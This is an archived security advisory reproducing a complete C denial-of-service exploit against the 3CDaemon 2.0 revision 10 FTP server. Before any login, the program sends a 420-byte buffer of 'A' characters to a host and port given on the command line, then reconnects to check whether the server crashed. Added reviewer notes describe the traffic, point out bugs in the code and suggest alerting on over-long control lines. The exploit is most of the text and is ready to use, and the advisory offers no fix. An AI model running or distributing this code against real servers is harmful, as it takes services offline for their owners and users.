|
COMMAND

    3Cdaemon remote DoS

SYSTEMS AFFECTED

    3Cdaemon 2.0 revision 10

PROBLEM

    MaD SKiLL 'H' [http://www.madskill.tk] says:

    When 400+ chars are sent to the FTP server, it crashes immediately.

    (In the sample below the data is sent immediately after connecting, before any login, so no FTP account is needed to trigger the crash.)

    Sample:
    ========

/* MaD SKiLL 'H'
 * MsH 4 life! http://www.madskill.tk
 * *Private Release*
 *
 * 3CDaemon 2.0 revision 10 DoS
 *
 * 11:12 14-4-2002: BOF flaw found by skyrim
 * 1:00 15-4-2002: exploit done.
 * 23:31 16-4-2002: Edited the exploit slightly, it's a better code now
 *
 * This program will exploit the buffer overflow vulnerability of
 * 3CDaemon 2.0 FTP servers. Sending 400+ chars will make the server crash
 * at any time they're sent.
 *
 * Tested on:
 * [OS] [version]
 * Windows XP (5.1 - 2600) 3CDaemon 2.0 revision 10
 *
 * ###
 * ##### #### ##
 * ###### ###### ######
 * ###### ######## ######## ######## ######
 * ###### ####### ### ########### ######## #######
 * ###### ######## #### ############ ######## #######
 * ############### ##### ############ ####### #######
 * ############## ###### ############ ####### #######
 * ############## ####### ########### ###### #######
 * ############# ######## ### ######## ###### #########
 * ############ ### #### ### ####### #################
 * ##### ############### ########## #################
 * ### ######### ##### ######### ################
 * #### ######### ##### ######### ################
 * ### ######### ############# ################
 * ## ######### ###### ###### #######
 * ### #### ###### #######
 * ###### ########
 * ###### ########
 * #### ## ###### ### ### ### ###### ########
 * ####### ######## ### #### ##### ##### #######
 * ############### ### #### ##### ##### #######
 * ####### ######## #### ##### ## ###
 * ###### ######### #### #### #####
 * ##### ######## #### #### ####
 * ###### ######## #### #### ### #### ##
 * ########## ### #### #### ########## ######
 * ######### ### ###########################
 * ########## ######## #####################
 * ############# ###### ########## ##########
 * ######## ##### #### ### ### ### ###
 *
 * I don't know
if this will work on versions other than the one I tested it on.
 * Have fun.
 *
 * Crew shouts go to: MsH, DFA, uDc
 * Personal shouts to: mannie, primus, amok, torment, talented, warsteam, frodo, maxxo,
 * xo|l, fearless, cybje, kell, frodo, maxxo, and everyone else.
 *
 * skyrim (skyrim@m4dskill.tk)
 */

/*
 * Reviewer notes, for triage and detection:
 *  - Wire behaviour: one TCP connection to the given host/port, then a single
 *    write of a buffer filled with 'A' (0x41) bytes. No FTP verb and no CRLF
 *    are sent, and nothing is read from the server first, so the trigger is
 *    reachable before authentication.
 *  - The advisory lists no fix. Generic containment is to limit which hosts can
 *    reach the FTP port; a control-channel line far longer than any FTP command
 *    is the obvious thing to alert on.
 *  - The "server is dead" verdict is only a failed reconnect (see main), so it
 *    is not proof that the service crashed.
 */
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

/* Number of filler bytes placed in the payload buffer. The advisory text says
 * 400+ characters are enough to crash the server. */
#define BOFSIZE 420

/* Print the tool banner to stdout.
 * NOTE(review): declared to return char but has no return statement; the one
 * caller in this file ignores the result. */
char banner(void) {
    printf(\"MaD SKiLL \'H\' 3CDaemon 2.0 revision 10 DoS\\n.:[MsH]:.\\n ---\\n\");
}

/* Report msg through perror() and terminate the process with status 1. */
void E(char *msg) {
    perror(msg);
    exit(1);
}

/*
 * Entry point. Expects exactly two arguments: hostname/ip and port.
 *
 * Steps: resolve the host, connect, write the filler buffer once, close, wait
 * five seconds, then attempt a second connection to the same address and
 * report the server as dead if that attempt fails.
 *
 * Exits with status 1 on a usage, socket, lookup, connect or write error, and
 * with 0 otherwise (both the "died" and the "still alive" outcomes return 0).
 */
main(int argc, char *argv[]) {
    /* Payload buffer; every byte is overwritten by the memset below, so it
     * holds no NUL terminator. */
    static char ownage[BOFSIZE];
    int sockfd, sockfd2, n;
    struct sockaddr_in server_addr;
    struct hostent *server;

    if (argc != 3) {
        fprintf(stderr,\"Usage: %s hostname/ip port\\n\", argv[0]);
        exit(1);
    }
    banner();
    memset(ownage, \'A\', BOFSIZE);

    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd < 0)
        E(\"Error occured during opening socket\");

    server = gethostbyname(argv[1]);
    if (server == NULL)
        E(\"Error occured during host lookup -No such host?-\\n\");

    /* Build the IPv4 destination from the first resolved address and the
     * port given on the command line (parsed with atoi, no validation). */
    bzero((char *) &server_addr, sizeof(server_addr));
    server_addr.sin_family = AF_INET;
    bcopy((char *)server->h_addr, (char *)&server_addr.sin_addr.s_addr, server->h_length);
    server_addr.sin_port = htons(atoi(argv[2]));

    printf(\"Connecting to target FTP server... \");
    if (connect(sockfd,&server_addr,sizeof(server_addr)) < 0) {
        E(\"Error occured during connecting\\n\");
    }
    printf(\"Connected, Probing BOF... \\n\");

    /* NOTE(review): strlen() runs on a buffer with no terminator, so it reads
     * past the end of ownage (undefined behaviour). The number of bytes put on
     * the wire is therefore at least BOFSIZE but not well defined; a detection
     * rule should match on an over-long line, not on an exact length. */
    n = write(sockfd,ownage,strlen(ownage));
    if (n < 0) {
        E(\"Error occured during writing to socket\");
    }
    close(sockfd);

    /* Liveness probe on a fresh socket. NOTE(review): sockfd2 is not checked,
     * and any connect failure (filtering, a failed socket() call, a slow
     * restart) is reported as a crash, so the verdict can be a false positive. */
    sockfd2=socket(AF_INET, SOCK_STREAM, 0);
    printf(\"Done, checking if server is dead.. \\n\");
    sleep(5);
    if (connect(sockfd2,&server_addr,sizeof(server_addr)) < 0) {
        printf(\"Couldn\'t establish connection: It seems like it died! =)\\n\");
        exit(0);
    }
    printf(\"Server is still alive. Perhaps its not vulnerable?\\n\");
    return 0;
}

SOLUTION

    dunno